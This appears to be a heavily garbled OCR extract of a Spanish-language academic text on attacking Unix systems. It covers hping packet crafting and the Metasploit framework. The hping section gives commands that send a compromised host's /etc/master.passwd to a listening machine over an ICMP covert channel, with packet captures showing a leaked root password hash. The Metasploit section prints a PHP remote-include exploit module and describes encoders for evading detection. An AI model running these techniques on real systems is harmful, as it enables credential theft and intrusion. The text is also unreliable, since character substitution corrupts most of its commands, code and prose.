re!ei@e74 37S pa!6et "o roun7-trip min;a@g;maD 1 0.0;0.0;0.0 m marcelo@saturno:~$ marcelo@saturno:~$ sudo Iping &z &i 10 &t 2 &- &p 21 200.12 .18..1 ?P8NH (00.1(3.1)+.5 9et'0 (00.1(3.1)+.5:: . et4 +0 'ea7er P 0 7ata bEte TT2 0 7uring tran it from ip1(00.51.(+1.((5 name1KN5NO&N 3: TT2 0 7uring tran it from ip1(00.51.(33.) name1KN5NO&N +: TT2 0 7uring tran it from ip1(00.51.(33.69 name1KN5NO&N 5: TT2 0 7uring tran it from ip1(00.51.(17.(3) name1KN5NO&N TT2 0 7uring tran it from ip1(00.51.(17.(3) name1KN5NO&N 6: TT2 0 7uring tran it from ip1(00.61.191.6 name1!u tomer1916.ip"annet>or6 .net 7: TT2 0 7uring tran it from ip1(00.61.175.6 name1!u tomer61-1756.ip"annet>or6 .net ): TT2 0 7uring tran it from ip1(00.1(3.1)+.5 name1!u tomer1(3-1)+5.ip"annet>or6 .net 9: "en1+6 ip1(00.1(3.1)+.5 tt"156 DB i710 port1(1 f"ag 1.# eq1) >in15)+0 rtt173.3 m --- (00.1(3.1)+.5 'ping tati ti! --9 pa!6et tran mitte74 9 pa!6et re!ei@e74 0S pa!6et "o roun7-trip min;a@g;maD 1 73.3;73.3;73.3 m marcelo@saturno:~$

Consola 20% Eje "los de Fraceroute con !a'load "ersonalizados

En la Consola 20 se

uestra la /le9ibilidad del

odo traceroute de ="ing%

"ri ero# detectando un $ost ;2...JO.*2*.*-+> "revio al destino# "resu ible ente
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. **J de 22O

Ca")tulo J. ( J.5.Mani"ulaci8n de !aquetes% ="ing

el router '&o /ireIall# que rec$aza los "aquetes que si ulan ser de un servidor 5@,. :uego con FF: igual a O no $a' res"uesta# segura ente es "orque el datagra a lleg8 a destino ;2...JO.*2*.*1.>. ,egundo# se env)a un traceroute con el "uerto FC! O. co o destino% evidente ente el /ireIall ;si lo $a'> "er ite que este "uerto destino "ase "or l. Fa bin es de destacar la /acilidad con la que ="ing "er ite ar ar Ccovert c annelsD sobre cualquier "rotocolo ' "uerto so"ortado# es"ecial ente "ara "uertas traseras% en la Consola -. se "uede ver c8 o se con/igura un canal alternativo "ara enviar arc$ivos utilizando el "rotocolo 7CM!# utilizando el "a'load del "rotocolo is o ;de *2. b'tes> "ara enviar el contenido del arc$ivo de claves de un siste a FreeB,5.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. **+ de 22O

Ca")tulo J. ( J.5.Mani"ulaci8n de !aquetes% ="ing

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. **O de 22O

Ca")tulo J. ( J.5.Mani"ulaci8n de !aquetes% ="ing


C3uipo comprometido: -rootI!i!"on d0N Iping 192.168.0.2 &&icmp &d 120 &&sign cla<ebac=door &&6ile /etc/master.pass>d ?P8NH 19(.16).0.( 9em0 19(.16).0.(:: i!mp mo7e et4 () 'ea7er P 1(0 7ata bEte "en11+) ip119(.16).0.( tt"16+ i71(975( i!mpA eq10 rtt1(.1 m "en11+) ip119(.16).0.( tt"16+ i71(9753 i!mpA eq11 rtt10.7 m "en11+) ip119(.16).0.( tt"16+ i71(975+ i!mpA eq1( rtt11.5 m ?...@ Cn el cliente: mar!e"oI aturno:dM sudo Iping &&listen cla<ebac=door 192.168.0. 0 &I etI0 &&icmp 'ping3 "i ten mo7e N MBreeC.D: r!;et!;ma ter.pa >74@ 1.+0 (005;06;06 (0:19:56 broo6 <Dp M N root:M1MqBq6.00"MP,Ob7&7g$"R7r?N MBreeC.D: r!;et!;ma ter.pa >74@ 1.+0 (005;06;06 (0:19:56 broo6 <Dp M N root:M1MqBq6.00"MP,Ob7&7g$"R7r?@=?Ta"50:0:0::0:0:,'ar"ie e:;root:;u r;"o!a";bin;ba ' toor:Q:0:0::0:0:Courne-again .uperu er:;root: 7aemon:@=?Ta"50:0:0::0:0:,'ar"ie e:;root:;u r;"o!a";bin;ba ' toor:Q:0:0::0:0:Courne-again .uperu er:;root: 7aemon:Q:1:1::0:0:O>ner of manE E tem pro!e e :;root:;u r; bin;no"ogin ?...@

Consola -.% Eje "lo de un Covert C$annel "ara Frans/erencia de arc$ivos sobre 7CM!

El rol que cu "le el equi"o atado es el de enviar el !ing# es el que lo recibe# ' es "or esto que se lo con/igura en

ientras el cliente

odo ClistenD. !ara que el

is o "ueda identi/icar# entre todo el tr/ico que ca"tura# la secuencia de "ings es"erada# se con/igura la utilizaci8n de un Cto6enD o cadena de caracteres en a bos e9tre os de la co unicaci8n co o una C/ir aD# que en este caso es Cclavebac6doorD. Co o se "uede ver en la Ca"tura *J# dic$o to6en es inclu)do en los "ri eros b'tes de cada "ing con in/or aci8n enviado "or el equi"o co "ro etido ;*02.*JO...-.>. 5e esta anera# el ="ing que est en odo C:istenD ;aunque en realidad es un "roceso que est en deter inar que dic$o "aquete est dirigido a l. odo "ro iscuo> "uede

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. **0 de 22O

Ca")tulo J. ( J.5.Mani"ulaci8n de !aquetes% ="ing


Brame 1 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 ,'e!6 um: 0D+00+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 0 90D0000: Data 91(0 bEte : 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 17 9+ 0( 63 3a (e 30 35 (3 30 +) 31 7b 0) 6b (0 70 30 36 0a 6! 96 )f 00 6+ 73 61 35 (0 7( (+ 5b 00 +0 6f 7( 73 (f 6( 6f 50 1f 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 0! 01 1( (3 65 6+ (f 6f 3a 6( (9 17 00 (0 7+ (! 30 6b (+ 37 e1 69 00 (+ 63 76 36 73 31 57 a( !0 63 +6 (f (0 (0 (0 (+ 6+ (6 a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 1e 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..1.-...:..e..<. ......I..i...... ....I.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?

Brame ( 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 ,'e!6 um: 0D+)0+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 0 90D0000: Data 91(0 bEte : 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 0! 9+ 1e 63 3a (e 30 35 (3 30 +) (9 7+ 00 6b (0 70 30 36 0a 6! e1 3) 00 6+ 73 61 35 (0 7( (+ a( 00 +) 6f 7( 73 (f 6( 6f 50 (6 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 17 01 1( (3 65 6+ (f 6f 3a 6( 31 )+ 00 (0 7+ (! 30 6b (+ 37 96 !0 00 (+ 63 76 36 73 31 57 5b !0 63 +6 (f (0 (0 (0 (+ 6+ 1f a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 0( 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..:..e..1.-...<. ..t)..I......... ....?.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?

Brame 3 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *2. de 22O

Ca")tulo J. ( J.5.Mani"ulaci8n de !aquetes% ="ing


,'e!6 um: 0D17(1 -!orre!t0 87entifier: 0D1)1( .equen!e number: (56 90D0100: Data 91(0 bEte : 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 30 (0 63 7( 7( 73 6e 17 9+ 0( 63 3a (6 61 3a 6e 65 3a 31 b) 0) 6b 30 3a 6! (a 65 7( 96 ba 00 6+ 3a (f (f 3a (7 3a 5b 00 17 6f 3a 7( 6( 30 61 (f 1f 00 (1 6f 30 6f 69 3a 67 7( 00 +0 1) 7( 3a 6f 6e 30 61 6f 0! 01 1( 76 30 7+ (f 3a 69 6f (9 +0 01 56 3a 3a 6( 3a 6e 7+ e1 3e 00 +) +3 (f 61 30 (0 3a a( !0 63 5+ 6) 75 73 3a 53 0a (6 a) 6! 61 61 73 6) 30 75 6+ 0) 00 61 6! 7( 7( 0a 3a 70 61 00 1e 76 +b 6! (f 7+ +( 65 65 +5 !0 65 30 69 6! 6f 6f 7( 67 00 a) 6( 3a 65 6f 6f 75 75 6f ..1.-...:..e..<. ......I.I>...... .....`....!"a@eb a!67oor@=?Ta"50: 0:0::0:0:,'ar"ie e:;root:;u r;"o !a";bin;ba '.too r:Q:0:0::0:0:Cou rne-again .uperu er:;root:.7aemo n:

Ca"tura *J% ="ing enviando de in/or aci8n en el "a'load de un !ing 7CM!

Es de destacar que si el /ireIall que est delante del sitio co "ro etido "er ite los !ings ;7CM! Ec$o> desde el is o $acia 7nternet# esta comunicaci-n puede saltearlo ! mu! posi(lemente pasar completamente desaperci(ido# 'a que 7CM! no es un "rotocolo de asiado interesante "ara observar. El sitio 4i6i de ="ing ;$tt"%&&Ii6i.$"ing.org> "osee todo ti"o. En resu en# ="ing tiene el "otencial de la @ a"# ' brindando al usuario un control a'or)a de las caracter)sticas de s "ersonalizado tanto de s C/inoD o s eje "los de

los "aquetes a enviar co o de las res"uestas obtenidas. Ade s tiene otras ca"acidades# co o el anlisis de reglas de /ireIalls e 75,s# ' la trans/erencia de arc$ivos en /or a CocultaD# sin contar lo que "osibilita su :a desventajas otor de scri"ting. s a"reciables "ueden llegar a ser su /alta de actualizaci8n

;la Glti a versi8n data del 2..5> ' la de una co unidad C/uerteD contribu'endo al desarrollo de scri"ts# /inger"rints# etc.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *2* de 22O

Ca")tulo +. ( Ca")tulo +. E9"lotaci8n de un ?bjetivo

/ap6tulo ". Fxplotaci-n de un 0(jetivo


Este es el "aso re oto a ;o s i "ortante ' di/)cil de alcanzar con 9ito% el acceso aneras s all de $aber ejor aGn# el control de> un $ost objetivo. =a' incontables

de lograrlo ' de ca inos sin salida en el "roceso# donde de nada si no se tiene 9ito en esta eta"a.

realizado las tareas "revias sin inconvenientes ' con buenos resultados# no sirven !or todo esto es i "osible enu erar o siquiera clasi/icar todos los ti"os de ataques e9istentes $o' en d)a. ,in e bargo# un so ero ;' sie "re corto> listado de las vulnera(ilidades clsicas ' incluir)a a ;S47R7UL2:@T>% Liolaciones de acceso de e oria# co o el Bu//er ?ver/loI s i "ortantes en el so/tIare de $o' en d)a

Errores de validaci8n de entradas%


Errores de /or ateo de strings 7n'ecci8n del ,V: 7n'ecci8n de c8digo A,, ;Cross ,ite ,cri"ting> en A"licaciones 4eb Acceso de 5irectorios ;(irector1 -raversal>

Condiciones de CCarreraD ;:ace &onditions> Escalado de !rivilegios !or otra "arte# los exploits "ueden clasi/icarse en ;S47R7UEA!:T>%

,egGn desde el lugar donde se ejecutan


<e otos :ocales Ejecutar c8digo arbitrario Acceder a datos sin "er iso Causar un 5o, ;5enegaci8n de ,ervicio*51>

,egGn su e/ecto

,egGn el Fi"o de Lulnerabilidad que a"rovec$an Ade s# e9iste un circuito que nor al ente recorre cada vulnerabilidad

descubierta antes que se cree un e9"loit que la a"rovec$e. ,egGn ;SMEFAUF??:T>#


*51 Ler Plosario% 5o,% 5enegaci8n de ,ervicio# "g. 2*.. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *22 de 22O

Ca")tulo +. ( Ca")tulo +. E9"lotaci8n de un ?bjetivo

estas instancias o CCiclo de LidaD de un e9"loit# son% 7. Descu(rimiento% AlgGn investigador o el +. Aviso% :o is o /abricante de so/tIare is o al /abricante. En is a que lo

descubre una vulnerabilidad en un so/tIare ' versi8n deter inada. s co Gn es que luego se avise del algunos casos# si ste no reconoce el /allo o a la "ersona ;co o Bugtraq# "or eje "lo>. 5e cualquier vulnerado# cosa que ocurre en "aralelo. ;. Anlisis% ,e analiza el /allo "ublicado "ara deter inar el alcance del is o# qu co "onente es a/ectado# en qu versiones del so/tIare ocurre# etc. <. Desarrollo del Fxploit% Co ienza el "roceso de desarrollar un e9"loit que $aga uso del /allo. Esto general ente requiere e9tensos conoci ientos de "rogra aci8n en bajo nivel# arquitectura de la quina# ,iste a ?"erativo# etc. Es "or esto que se la considera co o C agia negraD. . Testin)% Aqu) se co "rueba que el e9"loit /uncione en todos los casos donde deber)a $acerloH recordar que un /allo "uede involucrar di/erentes versiones# "lata/or as# etc. de un is o so/tIare. #. Release% El e9"loit se "ublica# general ente en /or a de c8digo /uente# ' odi/icado leve ente# a "ro"8sito# "ara que no /uncione en /or a directa. El objetivo es i "edir que alguien sin conoci ientos *55 lo utilice en /or a indiscri inada. 5ado lo abarcativa que es esta ateria# en este ca")tulo s8lo se introducir a

descubri8# la "ersona que lo descubre lo da a conocer en una lista "Gblica anera# el /abricante debe trabajar en una correcci8n o C"arc$eD "ara que su so/tIare no sea

la utilizaci8n de una $erra ienta que acude en a'uda de quienes desarrollan e9"loits# realizan tests de "enetraci8n# investigadores de seguridad# estudiantes universitarios# ad inistradores de red# ' "or qu no# usuarios con /ines non' sanctos. :uego se ostrarn unos eje "los de ejecuci8n de e9"loits# ' "or Glti o se dejar un listado de enlaces a 7nternet "ara "ro/undizar el te a.

*55 Estos usuarios que s8lo utilizan e9"loits sin conocer c8 o /uncionan se los lla a C,cri"t RiddiesD en la jerga. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *2- de 22O

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

+.*. El !ro'ecto Metas"loit


,egGn ;S,ECU!FT# "g. *0-># en el o ento del des"egue de/initivo de la industria de la ,eguridad 7n/or tica ;*00O(2..-># C>os investigadores individuales lan$aban exploits al mundo en cual#uier lenguaJe 1 para cual#uier plataforma #ue sent"an #ue era su favorita, &ada exploit inclu"a un pa1load a su eleccin S...TD ;es decir# $ac)a lo que quer)a el investigador># C 1 su accin no pod"a ser alterada sin modificar el cdigo fuente, 3sta falta de estandari$acin llev a situaciones frustrantes donde para una vulnerabilidad se dispon"an de tres o cuatro exploits para elegir, 1 ninguno ac"a lo #ue se deseaba.D El "ro'ecto Metas"loit*5J ;M,F N /etasploit Frame.ork> ve la luz en el aBo 2..-# con el objetivo de estandari3ar ! or)ani3ar estos aspectos ca-ticos 9asta ese momento: el desarrollo ! la pu(licaci-n de exploits . En "rinci"io era un "aquete de /unciones en lenguaje !erl*5+ que co Gn ente se utilizaban en la "rogra aci8n de estas "iezas de so/tIare# utilizaban estas bibliotecas. Con el tie "o# s algunos eje "los que justa ente s colaboradores ' e9"loits se /ueron

agregando al "ro'ecto# con lo que /ue evidente que el C"aquete de /uncionesD original necesitaba ser re"ensado "ara "oder satis/acer las de andas de los usuarios. As) /ue co o en el 2..J la versi8n -.. del M,F /ue lanzado# total ente reescrito en un lenguaje co o Ru(!*5O# que le a"orta gran dina is o# e9celente legibilidad# s8lida orientaci8n a objetos ' la "osibilidad de ejecutarse en todas las "lata/or as donde ste lenguaje est so"ortado ;la a'or)a>.

*5J 2<: del "ro'ecto% $tt"%&&III. etas"loit.org *5+ !erl es un lenguaje de scri"ts "er/or ance es u' e9tendido# "rinci"al ente utilizado en ad inistraci8n de ejor# aunque su siste as 2ni9 ' "rogra aci8n Ieb. ,in e bargo# su legibilidad no es la activa ente# est "erdiendo su do inio en

u' buena "ara ser inter"retado. ,i bien sigue siendo desarrollado anos de !=! ;"rinci"al ente en la "arte Ieb>#

!'t$on ' <ub'. ,u 2<: es% $tt"%&&III."erl.org& *5O <ub' es un lenguaje de scri"ting que si bien tiene bastante tie "o desarrollndose ;/ue creado en *005># en estos Glti os aBos incre ent8 su "o"ularidad enor e ente gracias a un /ra eIor6 de desarrollo Ieb lla ado C<ub' on <ailsD. Fiene co o "rinci"ales caracter)sticas ser a igable# "oseer una orientaci8n a objetos u' /uerte ' uc$a /le9ibilidad ;"or ej.# relativa baja e9celentes ca"acidades de intros"ecci8n>. ,u "rinci"al desventaja es su corrigiendo. 2<:% $tt"%&&III.rub'(lang.org Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *21 de 22O

"er/or ance en tie "o de ejecuci8n# aunque es un "roble a que con el tie "o se ir

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

+.*.*. Esque a de Funciona iento


!or su "arte# el /ra eIor6 a "artir de su versi8n -..# qued8 organizado conce"tual ente "or sus desarrolladores de la siguiente anera%

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *25 de 22O

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *2J de 22O

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *2+ de 22O

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *2O de 22O

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *20 de 22O

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-. de 22O

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-* de 22O

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

7lustraci8n 0% Metas"loit% 5iagra a Conce"tual

Es decir# que Metas"loit bsica ente dis"one de una Base de 5atos de E9"loits ' de !a'loads# donde el usuario "ara iniciar un ataque debe co binarlos# de acuerdo a las caracter)sticas del objetivo ' seleccionando ciertas o"ciones que "er itirn "ersonalizar el ataqueH tanto "ara tener 9ito ;?"ciones Avanzadas> co o "ara evitar la detecci8n ;"or "arte de los 75,s&7!,s segura ente>. En esta ilustraci8n se "ueden a"reciar relacionados los dos conce"tos i "ortantes dentro de la e9"lotaci8n del vulnerabilidades% Fxploit% C8digo que $ace C/allarD un so/tIare en /or a local o re ota a /avor del intruso# "ara /acilitar la ejecuci8n de un c8digo en el objetivo. A a'o de 2..O# la versi8n -.* de Metas"loit "osee 2J0 e9"loits dis"onibles# s all de los que segura ente se "ueden "rogra ar a"rovec$ando las /acilidades del /ra eIor6.

4a!load% Lendr)a a cu "lir la /unci8n del c8digo a ejecutar en el objetivo# en caso de que el E9"loit enviado tenga 9ito. :a gran ventaja que "osee Metas"loit es que al estar se"arado ' abstra)do del e9"loit# es "osible co binar di/erentes e9"loits con di/erentes "a'loads# ' obtener resultados segGn lo que se desee% correr una consola re ota# ejecutar un co ando#

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-2 de 22O

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

etc. :o interesante de este diagra a de /unciona iento es que sirve en /or a genrica# ' "uede a"licarse a cualquier $erra ienta si ilar# 'a que representa la manera )eneralmente aceptada de atacar el pro(lema de c-mo 9acer un exploit ! c-mo =uncionan. !or eje "lo# en la Consola -* "uede verse el c8digo /uente de un e9"loit inclu)do en el M,F que a"rovec$a una vulnerabilidad en !=!. Bsica ente se divide en dos "artes% una de inicializaci8n ;la /unci8n CinitializeD># que "er ite integrarse al /ra eIor6# ejecutando una serie de de/inicionesH consta de unas "ocas l)neas. ,in e bargo# "ara reducir al )ni o la cantidad de l)neas de esta anera# =ue imprescindi(le utili3ar al)unas clases ! =unciones disponi(les en el 2rame@or:# "or eje "lo de los "aquetes E9"loit%%<e ote ' <e9%%Fe9t. En ca bio# si el exploit 9u(iera tenido que escri(irse por separado% aislado del 1A2% en un len)uaje como /% se)uramente ser6a muc9o ms lar)o% di=6cil de estudiar ! de modi=icar% adems de pro)ramar. ientras que el e9"loit en s) se ejecuta en la /unci8n C"$"Ue9"loitD# que co o se "uede ver# s8lo

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-- de 22O

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit


require Jm f;!oreJ module 3 f class <Dp"oit ::KniD::&ebapp::P?PA8N,2KD< T 3 f::<Dp"oit::$emote in!"u7e <Dp"oit::$emote::T!p in!"u7e <Dp"oit::$emote::?ttp.er@er::P?P8n!"u7e de6 initia"iOe9info 1 ab: super9up7ateAinfo9info4 JNameJ 1> JP?P 8n!"u7e Heneri! <Dp"oitJ4 JDe !riptionJ 1> Sqab4 J#ut'orJ 1> - J'7mJ 04 J2i!en eJ 1> 3.BA28,<N.<4 J=er ionJ 1> JM$e@i ion: 5365 MJ4 J$eferen!e J 1> -04 JPri@i"ege7J 1> fa" e4 JPaE"oa7J 1> a JDi ab"eNop J 1> true4 J.pa!eJ 1> 3(76)4 b4 JP"atformJ 1> Jp'pJ4 J#r!'J 1> #$,?AP?P4 JTarget J 1> -- J#utomati!J4 a b004 JDefau"tTargetJ 1> 0:: regi terAoption 9-Opt.tring.ne>9JP?PK$8J4 -true4 VT'e K$8 to reque t4 >it' t'e in!"u7e parameter !'ange7 to `K$2`V4 V;te t.p'p*pat'1`K$2`V0:404 sel6.class: end de6 p'pAeDp"oit !onne!t req 1 VH<T Na7ata tore-JP?PK$8J0.g ub9J`K$2`J4 $eD::TeDt.uriAen!o7e9p'pAin!"u7eAur"::b ?TTP;1.0[r[n[r[nV printA tatu 9V.en7ing: #{req}") o!6.put9req: 7i !onne!t end end end

Consola -*% E9"loit inclu)do en el Fra eIor6 Metas"loit -..

+.*.2. Arquitectura ' Co "onentes


!ara tener una idea tcnica de c8 o est organizado ' qu subsiste as integran el Fra eIor6# ;SMEFAUF??:T# "g. *1> inclu'e un gr/ico ;7lustraci8n Error% <e/erence source not /ound># con una vista de alto nivel de los s i "ortantes. 8dulos

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-1 de 22O

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

7lustraci8n *.% Arquitectura de Metas"loit

En un breve listado ' descri"ci8n de los los siguientes ;ver SMEFAU5ELPT>%

s relevantes# "odr)an incluirse

7. Rex ;<ub' E9tension :ibrar'>% <e9 es el co "onente todo el Fra eIor6# ' su Gnica de"endencia es <ub' '

s i "ortante de is o s los

8dulos inclu)dos con el lenguaje. Bsica ente es una colecci8n de clases 8dulos que "ueden ser utilizados "or "rogra adores "ara construir 8dulos alrededor del M,F. :os 8dulos s relevantes anejando anera $erra ientas o

que lo co "onen*50 son% aE Assem(l!% Es Gtil "ara realizar o"eraciones a bajo nivel# los registros del "rocesador# "ila# etc.# ' en di/erentes arquitecturas ;little(endian&big(endian# !oIer!C# ,"arc# 9OJ# etc.>. Es una si "le e integrada al entorno de acceder a todos los ?"codes *J. de una
*50 !ara ver el c8digo /uente de <e9 ' sus *J. Ler Plosario% ?"code# "g. 2**. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-5 de 22O 8dulos# s8lo $a' que dirigirse al directorio `&lib&re9&hno breU 8duloe en una instalaci8n estndar de M,F.

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

"lata/or a. (E Fncodin)% ,irve "ara o/uscar*J* el contenido de un "a'load. Es i "ortante utilizarlo en caso de tener la certeza de que $a' un 75, veri/icando el tr/ico que se env)a al objetivo. cE Po(s ;Frabajos>% En ocasiones es necesario dividir una tarea en varios trabajos. :os Jobs o trabajos se de/inen co o )te s de trabajo /initos que tienen una tarea es"ec)/ica. 5e esta dE Lo))in)% Es un servicio de eE 4ost.exploitation% Este anera# la idea es /acilitar la coordinaci8n de estos trabajos con /unciones es"ec)/icas "ara ello. ensajes de estado ;:ogs> dentro del Fra eIor6# clasi/icado "or niveles ;de . a ->. 8dulo "rovee servicios 'a incor"orados "ara se dis"onen una gran variedad de utilizar re ota ente el objetivo una vez que el e9"loit tuvo 9ito. !or eje "lo# la clase ,tda"i*J2 /unciones% acceso a arc$ivos# red# siste a ' otras "ro"iedades de la quina re ota que son casi universales. =E 4rotocols% 5a so"orte a "rotocolos estndar co o =FF!# ,MB# 5CE<!C ' ,2@<!C. )E Aervices% !er ite que uno o varios e9"loits se registren co o C,ervicioD ' escuc$en ;en "odr)an ser resultados> al ,ervidores FC!&25!# odo "ro iscuo> "or tr/ico ;' que bien is o tie "o.

9E Aoc:ets% !rovee acceso a la A!7 de ,oc6ets de <ed ;Clientes ' anejo de ,,:# etc.>. iE A!nc9roni3ation% 5ado que M,F $ace uso del Multi(F$reading# aqu) se "roveen rutinas que "er iten a"rovec$arlo. +. 2rame@or: /ore% 7 "le enta un conjunto de clases que /uncionan de inter/az a los 8dulos ' "lugins del /ra eIor6H es decir# si se desea $acer 8dulo "ara M,F# es necesario trabajar con este un "lugin o un

co "onente. Frabaja con un en/oque basado en instancias del /ra eIor6. aE DataAtore% ActGa co o un re"ositorio de datos del entorno de la instancia. (E Fvent Noti=ications% !er ite que los desarrolladores de
*J* Ler Plosario% ?/uscaci8n# "g. 2**. *J2 :a clase ,tda"i se encuentra en el arc$ivo ubicado en &/ra eIor6( -.*&lib&re9&"ost& eter"reter&e9tensions&stda"i&stda"i.rb. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-J de 22O

8dulos '

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

"lugins reaccionen a di/erentes eventos del /ra eIor6# a travs de un t)"ico "roceso de registro de /ra eIor6# co o ;. 2rame@or: &ase% Este anejadores ; andlers>. cE 2rame@or: 1ana)ers% !er ite ad inistrar co "onentes cr)ticos del 8dulos# "lugins# sesiones ' trabajos. 8dulo est construido enci a del Core# ' "rovee

todos "ara /acilitar la interacci8n con l. aE /on=i)uration% Mantiene una con/iguraci8n "ersistente# ade s de /unciones "ara conocer la estructura de la instalaci8n ;"or eje "lo# el directorio ra)z de la is a>. 8dulos (E Lo))in)% !rovee so"orte de logging "ara el nGcleo ' "revia ente. cE Aessions% !er ite acceder a las sesiones re otas establecidas "or el usuario ;Co and,$ell o Meter"reter>. <. 2rame@or: User Inter=aces% Ler a"artado +.*.-. . 2rame@or: 1odules% El "ro"8sito "rinci"al del Fra eIor6 es /acilitar el desarrollo de Fra eIor6 ' el 8dulos que "uedan conectarse al is o ' co "artirse. Esto sucede# "or eje "lo# cuando se agrega un nuevo !a'load al is o estar dis"onible "ara ser utilizado en cualquier 8dulos descienden E9"loit# 'a que toda la arquitectura tiene bien de/inida sus inter/aces# clases ' relaciones. !ara dar otro eje "lo# todos los de la clase base Ms/%%Module# ' as) sucesiva ente. aE Fncoder% Estos 8dulos sirven "ara generar versiones trans/or adas de los "a'loads en crudo# "ara que "ri ero viajen "or la red# eviten ser detectados "or 75,s ' luego s)# ser decodi/icados en el objetivo "ara su "osterior ejecuci8n. 2n algorit o co Gn que se utiliza es el A?< binario# "or lo r"ido ' sencillo. Est basado en <e9%%Encoding. (E Fxploit% Es el /oco "rinci"al del Fra eIor6. ,on utilizados "ara /orzar vulnerabilidades de cE N04 Menerators% Estos anera que "er ita al M,F ejecutar c8digo 8dulos se da en la clase Ms/%%E9"loit. 8dulos son utilizados "ara crear una cadena arbitrario. El so"orte "ara estos

"rinci"ales# utilizando las /unciones de <e9%%:ogging# descri"to

de instrucciones asse bler ;lla ados @?!s> que no "rovoquen ningGn e/ecto cuando se ejecuten# s8lo alterar el estado de los registros o odi/icar banderas ;flags> del "rocesador. ,on bastante utilizados en
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *-+ de 22O

Ca")tulo +. ( +.*.El !ro'ecto Metas"loit

